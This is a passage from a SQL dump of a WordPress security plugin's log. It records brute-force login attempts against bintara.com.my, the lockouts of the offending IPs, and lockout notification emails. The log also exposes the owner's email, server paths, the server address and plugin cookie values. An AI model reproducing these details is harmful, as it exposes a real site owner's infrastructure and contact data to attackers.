15:23:20',19315696,20717368,'https://bintara.com.my/wp/wp-login.php',1,0,'51.77.193.28'),(26629,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"51.77.193.28\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:23:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:23:20\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:23:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:23:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:23:21','2019-09-21 15:23:20',19315656,20717368,'https://bintara.com.my/wp/wp-login.php',1,0,'51.77.193.28'),(26630,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:23:21','2019-09-21 15:23:20',19524088,20717368,'https://bintara.com.my/wp/wp-login.php',1,0,'51.77.193.28'),(26631,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZArknlR@6WyRVzpiDsHQAAABU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"45.117.168.236\";s:11:\"REMOTE_PORT\";s:5:\"44724\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZArknlR@6WyRVzpiDsHQAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079470.6789\";s:12:\"REQUEST_TIME\";s:10:\"1569079470\";}}','notice','2019-09-21 15:24:32','2019-09-21 15:24:31',19230136,20718280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.117.168.236'),(26632,0,'lockout','host-lockout::45.117.168.236','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"45.117.168.236\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:24:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:24:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:24:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:24:31\";s:12:\"lockout_host\";s:14:\"45.117.168.236\";}','action','2019-09-21 15:24:32','2019-09-21 15:24:31',19317248,20718280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.117.168.236'),(26633,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"45.117.168.236\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:24:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:24:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:24:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:24:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:24:32','2019-09-21 15:24:31',19317024,20718280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.117.168.236'),(26634,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:24:32','2019-09-21 15:24:31',19525632,20718280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.117.168.236'),(26635,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZA-UnlR@6WyRVzpiDsagAAABA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.22.194\";s:11:\"REMOTE_PORT\";s:5:\"40398\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZA-UnlR@6WyRVzpiDsagAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079549.8851\";s:12:\"REQUEST_TIME\";s:10:\"1569079549\";}}','notice','2019-09-21 15:25:51','2019-09-21 15:25:50',19231696,20720088,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.22.194'),(26636,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:25:50\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:25:50\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:25:50\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:25:50\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:25:51','2019-09-21 15:25:50',19316736,20720088,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.22.194'),(26637,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:25:51','2019-09-21 15:25:50',19524112,20720088,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.22.194'),(26638,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBGXkXpgmG5P@iB8lGsQAAAJg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.77.168\";s:11:\"REMOTE_PORT\";s:5:\"46198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBGXkXpgmG5P@iB8lGsQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079577.2419\";s:12:\"REQUEST_TIME\";s:10:\"1569079577\";}}','notice','2019-09-21 15:26:18','2019-09-21 15:26:17',19233016,20722376,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.77.168'),(26639,0,'lockout','host-lockout::139.59.77.168','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"139.59.77.168\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:26:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:26:17\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:26:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:26:17\";s:12:\"lockout_host\";s:13:\"139.59.77.168\";}','action','2019-09-21 15:26:18','2019-09-21 15:26:17',19319240,20722376,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.77.168'),(26640,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"139.59.77.168\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:26:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:26:17\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:26:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:26:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:26:18','2019-09-21 15:26:17',19319168,20722376,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.77.168'),(26641,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:26:18','2019-09-21 15:26:17',19528368,20722376,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.77.168'),(26642,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"icwp-wpsf=7256f8f6d2dd54124ff101c060542094; wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBJ0nlR@6WyRVzpiDsfwAAABQ\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"42338\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBJ0nlR@6WyRVzpiDsfwAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079591.3052\";s:12:\"REQUEST_TIME\";s:10:\"1569079591\";}}','notice','2019-09-21 15:26:33','2019-09-21 15:26:31',27556560,29108664,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.171.46'),(26643,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:26:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:26:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:26:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:26:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:26:33','2019-09-21 15:26:31',27638072,29108664,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.171.46'),(26644,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:26:33','2019-09-21 15:26:31',27998816,29108664,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.171.46'),(26645,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=60f7f48efb10cff503d02897815fe869\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBPDDrcQxTmGrCWuaXbwAAAdg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.153.203\";s:11:\"REMOTE_PORT\";s:5:\"48956\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBPDDrcQxTmGrCWuaXbwAAAdg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079612.3897\";s:12:\"REQUEST_TIME\";s:10:\"1569079612\";}}','notice','2019-09-21 15:26:54','2019-09-21 15:26:52',27565824,29116168,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.153.203'),(26646,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:26:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:26:52\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:26:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:26:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:26:54','2019-09-21 15:26:52',27647400,29116168,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.153.203'),(26647,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:26:54','2019-09-21 15:26:52',28008248,29116168,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.153.203'),(26648,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 